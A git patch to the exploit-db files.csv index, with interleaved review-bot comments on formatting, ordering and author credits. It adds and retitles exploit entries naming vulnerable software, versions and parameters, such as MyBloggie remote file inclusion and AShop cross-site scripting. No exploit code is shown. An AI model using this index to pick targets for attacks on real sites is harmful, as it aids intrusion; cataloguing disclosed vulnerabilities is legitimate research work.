From b080c70f8b4c47f62e153ee12ae72f4ac11bfbcc Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 14 Dec 2016 05:01:23 +0000 Subject: [PATCH] DB: 2016-12-14 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 7 new exploits Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047) Xitami Web Server 5.0a0 - Denial of Service OpenSSL 1.1.0a/1.1.0b - Denial of Service Serva 3.0.0 HTTP Server - Denial of Service iOS 10.1.x - Certificate File Memory Corruption OpenBSD 4.0 - (vga) Privilege Escalation OpenBSD 4.0 - 'vga' Privilege Escalation 10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections AShop Deluxe 4.x - (catalogue.php cat) SQL Injection AShop Deluxe 4.x - 'catalogue.php' SQL Injection HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion CAT2 - (spaw_root) Local File Inclusion CAT2 - 'spaw_root' Parameter Local File Inclusion MyBloggie 2.1.3 - search.php SQL Injection MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting 
MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting MyBloggie 2.1.x - Multiple Remote File Inclusion MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting Smart Guard Network Manager 6.3.2 - SQL Injection WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery --- files.csv | 59 +++++++------ platforms/ios/dos/40906.txt | 139 +++++++++++++++++++++++++++++++ platforms/linux/dos/40899.py | 123 
+++++++++++++++++++++++++++
 platforms/php/webapps/26326.html | 14 ----
 platforms/php/webapps/27957.txt | 12 ---
 platforms/php/webapps/40904.txt | 27 ++++++
 platforms/php/webapps/40908.html | 64 ++++++++++++++
 platforms/windows/dos/40905.py | 72 ++++++++++++++++
 platforms/windows/dos/40907.html | 47 +++++++++++
 platforms/windows/local/40903.py | 32 +++++++
 10 files changed, 536 insertions(+), 53 deletions(-)
 create mode 100755 platforms/ios/dos/40906.txt
 create mode 100755 platforms/linux/dos/40899.py
 delete mode 100755 platforms/php/webapps/26326.html
 delete mode 100755 platforms/php/webapps/27957.txt
 create mode 100755 platforms/php/webapps/40904.txt
 create mode 100755 platforms/php/webapps/40908.html
 create mode 100755 platforms/windows/dos/40905.py
 create mode 100755 platforms/windows/dos/40907.html
 create mode 100755 platforms/windows/local/40903.py
diff --git a/files.csv b/files.csv
index bec4b9934..09fc77181 100644
--- a/files.csv
+++ b/files.csv
@@ -3556,6 +3556,7 @@ id,file,description,date,author,platform,type,port
 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0
 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0
 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
+40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
 27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0
 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0
 28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos,0
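Review bot: The description added for 40907 appears to carry invisible soft-hyphen characters (U+00AD) between the parts of CSelectionInteractButtonBehavior and _UpdateButtonLocation, so the class and method names as stored will not match a plain-text search for them; the 40896 context line in the later dos hunk shows the same characters in CElement::HasFlag, which suggests both titles were pasted from a rendered page. I would store the identifier without them: `40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelectionInteractButtonBehavior::_UpdateButtonLocation Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0`. The entry is also inserted between ids 27942 and 27993, whereas the other new dos entries in this commit (40899, 40905, 40906) are appended at the end of the dos block; placing 40907 next to them would keep the block in one order.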
@@ -3996,7 +3997,7 @@ id,file,description,date,author,platform,type,port
 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
 31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
-40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,"Stefan Petrushevski",windows,dos,0
+40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,sm,windows,dos,0
 31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
 31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0
 31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
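Review bot: The author field for 40849 is rewritten from "Stefan Petrushevski" to sm, but the commit message only lists the Xitami title among the touched entries and gives no indication that the author credit is what changed, so the reason for the change is not recorded anywhere in this patch. If the correction is intentional, one line in the commit message naming it (and the source of the corrected credit) would let a later reader tell it apart from an accidental edit.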
@@ -5300,6 +5301,9 @@ id,file,description,date,author,platform,type,port
 40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
 40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
 40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,windows,dos,0
+40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0
+40905,platforms/windows/dos/40905.py,"Serva 3.0.0 HTTP Server - Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
+40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
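Review bot: 40899 is filed under platform linux (platforms/linux/dos/40899.py), while the header of the script added later in this patch states `# Platform: Multiple` and the affected component is an OpenSSL build rather than anything Linux-specific; the csv platform and the script header should agree so that a search by platform finds the entry. Similarly, 40906 is titled "iOS 10.1.x", whereas the crash reports quoted in the added advisory all read `iPhone OS 10.0.1 (14A403)`; if 10.1.x comes from the vendor references rather than the author's test device, that is worth stating in the entry or the advisory.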
@@ -5865,7 +5869,7 @@ id,file,description,date,author,platform,type,port
 5667,platforms/windows/local/5667.py,"VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal Exploit",2008-05-23,j0rgan,windows,local,0
 5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - 'dne2000.sys' Kernel Ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0
 5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,windows,local,0
-5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - (vga) Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
+5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - 'vga' Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
 6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local,0
 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0
 6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0
@@ -8692,6 +8696,7 @@ id,file,description,date,author,platform,type,port
 40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
 40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
 40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
+40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -16370,7 +16375,7 @@ id,file,description,date,author,platform,type,port
 2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0
 2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote File Inclusion",2006-08-02,beford,php,webapps,0
 2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0
-2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
+2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
 2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0
@@ -19064,12 +19069,12 @@ id,file,description,date,author,platform,type,port
 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps,0
 5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0
 5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
-5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
+5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - 'catalogue.php' SQL Injection",2008-06-30,n0c0py,php,webapps,0
 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
 5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
-5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
+5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
-5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
+5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
 5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
 5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
 5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0
@@ -28115,7 +28120,6 @@ id,file,description,date,author,platform,type,port
 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0
-26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - search.php SQL Injection",2005-10-06,trueend5,php,webapps,0
 26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0
 26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0
 26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - newmsg.php fid Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0
@@ -28941,16 +28945,16 @@ id,file,description,date,author,platform,type,port
 27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0
 27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0
 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0
-27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
 27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
 27391,platforms/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - calendar.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad
Jovanovic",php,webapps,0
 27392,platforms/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - forums.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
@@ -29372,7 +29376,6 @@ id,file,description,date,author,platform,type,port
 27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
 27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
 27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Inclusion",2006-06-02,ERNE,php,webapps,0
 27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0
 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0
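Review bot: The retitled 27387 line reads "'trackback_url' Parameter Cross-Site Scripting" and drops the add.php script name that the removed title carried, while every other line in the 27380–27389 group is retitled to keep its script name in quotes; the group therefore ends up with one entry that no longer names the affected file. Keeping the same form as its siblings, `27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'add.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0`, would make the series uniform. This hunk starts on an earlier line of the patch and its 27391 record is split across a line break in this rendering.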
@@ -29623,7 +29626,7 @@ id,file,description,date,author,platform,type,port
 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0
 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0
 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0
-28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
+28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
@@ -30379,12 +30382,12 @@ id,file,description,date,author,platform,type,port
 29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0
 29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0
-29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - 
'shipping.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
 29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - search.asp Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0
 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0
 29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
@@ -30458,9 +30461,9 @@ id,file,description,date,author,platform,type,port
 29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - new.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
 29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
 29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
-29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
+29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
 40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
-29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
+29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
